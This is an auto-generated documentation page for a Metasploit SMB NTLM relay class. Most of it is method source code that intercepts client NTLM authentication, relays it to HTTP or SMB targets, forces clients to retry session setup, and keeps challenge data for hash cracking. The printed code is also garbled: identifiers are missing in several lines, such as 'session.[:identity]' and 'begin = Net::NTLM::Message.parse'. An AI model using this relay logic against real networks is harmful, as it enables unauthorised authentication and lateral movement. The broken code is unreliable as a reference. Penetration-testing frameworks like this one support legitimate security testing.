Class: Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient
- Inherits:
-
RubySMB::Server::ServerClient
- Object
- RubySMB::Server::ServerClient
- Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient
- Defined in:
- lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
Overview
This class represents a single connected client to the server. It stores and processes connection specific related information. Has overridden methods than allow smb relay attacks.
Constant Summary collapse
- FORCE_RETRY_SESSION_SETUP =
The NT Status that will cause a client to reattempt authentication
::WindowsError::NTStatus::STATUS_NETWORK_SESSION_EXPIRED
Instance Method Summary collapse
- #create_relay_client(target, timeout) ⇒ Object
- #do_session_setup_smb2(request, session) ⇒ Object
- #do_tree_connect_smb2(request, session) ⇒ Object
-
#handle_smb1(raw_request, header) ⇒ RubySMB::GenericPacket
Handle an SMB version 1 message.
-
#initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:) ⇒ ServerClient
constructor
A new instance of ServerClient.
- #relay_ntlmssp(session, incoming_security_buffer = nil) ⇒ Object
Constructor Details
#initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:) ⇒ ServerClient
Returns a new instance of ServerClient.
12 13 14 15 16 17 18 19 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 12 def initialize(server, dispatcher, relay_timeout:, relay_targets:, listener:) super(server, dispatcher) @timeout = relay_timeout @relay_targets = relay_targets @relay_timeout = relay_timeout @listener = listener end |
Instance Method Details
#create_relay_client(target, timeout) ⇒ Object
205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 205 def create_relay_client(target, timeout) case target.protocol when :http, :https client = Target::HTTP::Client.create(self, target, logger, timeout) when :smb client = Target::SMB::Client.create(self, target, logger, timeout) else raise RuntimeError, "unsupported protocol: #{target.protocol}" end client rescue ::Rex::ConnectionTimeout => e msg = "Timeout error retrieving server challenge from target #{target}. Most likely caused by unresponsive target" elog(msg, error: e) logger.print_error msg nil rescue ::Exception => e msg = "Unable to create relay to #{target}" elog(msg, error: e) logger.print_error msg nil end |
#do_session_setup_smb2(request, session) ⇒ Object
67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 67 def do_session_setup_smb2(request, session) # TODO: Add shared helper for grabbing session lookups session_id = request.smb2_header.session_id if session_id == 0 session_id = rand(1..0xfffffffe) session = @session_table[session_id] = ::RubySMB::Server::Session.new(session_id) else session = @session_table[session_id] if session.nil? response = SMB2::Packet::ErrorPacket.new response.smb2_header.nt_status = WindowsError::NTStatus::STATUS_USER_SESSION_DELETED return response end end # Perform a normal setup flow with ruby_smb unless session&.[:relay_mode] response = super session.[:identity] = session.user_id # TODO: Remove guest flag return response end relay_result = self.relay_ntlmssp(session, request.buffer) return if relay_result.nil? response = ::RubySMB::SMB2::Packet::SessionSetupResponse.new response.smb2_header.credits = 1 response.smb2_header. = request.smb2_header. response.smb2_header.session_id = session_id response.smb2_header.nt_status = relay_result.nt_status.value if relay_result.nt_status == ::WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED response.smb2_header.nt_status = ::WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED.value response.buffer = relay_result..serialize if @dialect == '0x0311' update_preauth_hash(response) end return response end update_preauth_hash(request) if @dialect == '0x0311' if relay_result.nt_status == WindowsError::NTStatus::STATUS_SUCCESS response.smb2_header.credits = 32 session.state = :valid session.user_id = session.[:identity] # TODO: This is invalid now with the relay logic in place session.key = @gss_authenticator.session_key session.signing_required = request.security_mode.signing_required == 1 elsif relay_result.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED && @dialect == '0x0311' update_preauth_hash(response) end response end |
#do_tree_connect_smb2(request, session) ⇒ Object
21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 21 def do_tree_connect_smb2(request, session) logger.print_status("Received request for #{session.[:identity]}") # Attempt to select the next target to relay to session.[:relay_target] = @relay_targets.next(session.[:identity]) # If there's no more targets to relay to, just tree connect to the currently running server instead if session.[:relay_target].nil? logger.print_status("Identity: #{session.[:identity]} - All targets relayed to") return super(request, session) end logger.print_status("Relaying to next target #{session.[:relay_target]}") relayed_connection = create_relay_client( session.[:relay_target], @relay_timeout ) if relayed_connection.nil? @relay_targets.on_relay_end(session.[:relay_target], identity: session.[:identity], is_success: false) session.[:relay_mode] = false else session.[:relay_mode] = true end session.[:relayed_connection] = relayed_connection session.state = :in_progress response = RubySMB::SMB2::Packet::TreeConnectResponse.new response.smb2_header.nt_status = FORCE_RETRY_SESSION_SETUP.value response end |
#handle_smb1(raw_request, header) ⇒ RubySMB::GenericPacket
Handle an SMB version 1 message.
61 62 63 64 65 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 61 def handle_smb1(raw_request, header) _port, ip_address = ::Socket::unpack_sockaddr_in(getpeername) logger.print_warning("Cannot relay request from #{ip_address}. The SMB1 #{::RubySMB::SMB1::Commands.name(header.command)} command is not supported - https://github.com/rapid7/metasploit-framework/issues/16261") raise NotImplementedError end |
#relay_ntlmssp(session, incoming_security_buffer = nil) ⇒ Object
126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 |
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 126 def relay_ntlmssp(session, incoming_security_buffer = nil) # TODO: Handle GSS correctly # gss_result = process_gss(incoming_security_buffer) # return gss_result if gss_result # TODO: Add support for a default NTLM provider in ruby_smb begin = Net::NTLM::Message.parse(incoming_security_buffer) rescue ArgumentError return end # NTLM negotiation request # Choose the next machine to relay to, and send the incoming security buffer to the relay target if .is_a?(::Net::NTLM::Message::Type1) relayed_connection = session.[:relayed_connection] logger.info("Relaying NTLM type 1 message to #{relayed_connection.target.ip} (Always Sign: #{.has_flag?(:ALWAYS_SIGN)}, Sign: #{.has_flag?(:SIGN)}, Seal: #{.has_flag?(:SEAL)})") relay_result = relayed_connection.relay_ntlmssp_type1(incoming_security_buffer) return nil unless relay_result&.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED # Store the incoming negotiation message, i.e. ntlm_type1 session.[:incoming_negotiate_message] = # Store the relay target's server challenge, as it is used later when creating the JTR hash session.[:relay_target_server_challenge] = relay_result. relay_result # NTLM challenge, which should never be received from a calling client elsif .is_a?(::Net::NTLM::Message::Type2) RubySMB::Gss::Provider::Result.new(nil, WindowsError::NTStatus::STATUS_LOGON_FAILURE) # NTLM challenge response elsif .is_a?(::Net::NTLM::Message::Type3) relayed_connection = session.[:relayed_connection] logger.info("Relaying #{.ntlm_version == :ntlmv2 ? 'NTLMv2' : 'NTLMv1'} type 3 message to #{relayed_connection.target} as #{session.[:identity]}") relay_result = relayed_connection.relay_ntlmssp_type3(incoming_security_buffer) is_success = relay_result&.nt_status == WindowsError::NTStatus::STATUS_SUCCESS @relay_targets.on_relay_end(relayed_connection.target, identity: session.[:identity], is_success: is_success) if is_success logger.print_good("Identity: #{session.[:identity]} - Successfully authenticated against relay target #{relayed_connection.target}") session.[:incoming_challenge_response] = @listener.on_ntlm_type3( address: relayed_connection.target.ip, ntlm_type1: session.[:incoming_negotiate_message], ntlm_type2: session.[:relay_target_server_challenge], ntlm_type3: session.[:incoming_challenge_response] ) @listener.on_relay_success(relay_connection: relayed_connection, relay_identity: session.[:identity]) else @listener.on_relay_failure(relay_connection: relayed_connection) relayed_connection.disconnect! if relay_result.nil? || relay_result.nt_status.nil? logger.print_error("Identity: #{session.[:identity]} - Relay against target #{relayed_connection.target} failed with unknown error") elsif relay_result.nt_status == WindowsError::NTStatus::STATUS_LOGON_FAILURE logger.print_warning("Identity: #{session.[:identity]} - Relayed client authentication failed on target server #{relayed_connection.target}") else error_code = WindowsError::NTStatus.find_by_retval(relay_result.nt_status.value).first if error_code.nil? logger.print_warning("Identity: #{session.[:identity]} - Relay against target #{relayed_connection.target} failed with unexpected error: #{relay_result.nt_status.value}") else logger.print_warning("Identity: #{session.[:identity]} - Relay against target #{relayed_connection.target} failed with unexpected error: #{error_code.name}: #{error_code.description}") end end session..delete(:relay_mode) end relay_result # Should never occur else logger.error("Invalid ntlm request") RubySMB::Gss::Provider::Result.new(nil, WindowsError::NTStatus::STATUS_LOGON_FAILURE) end end |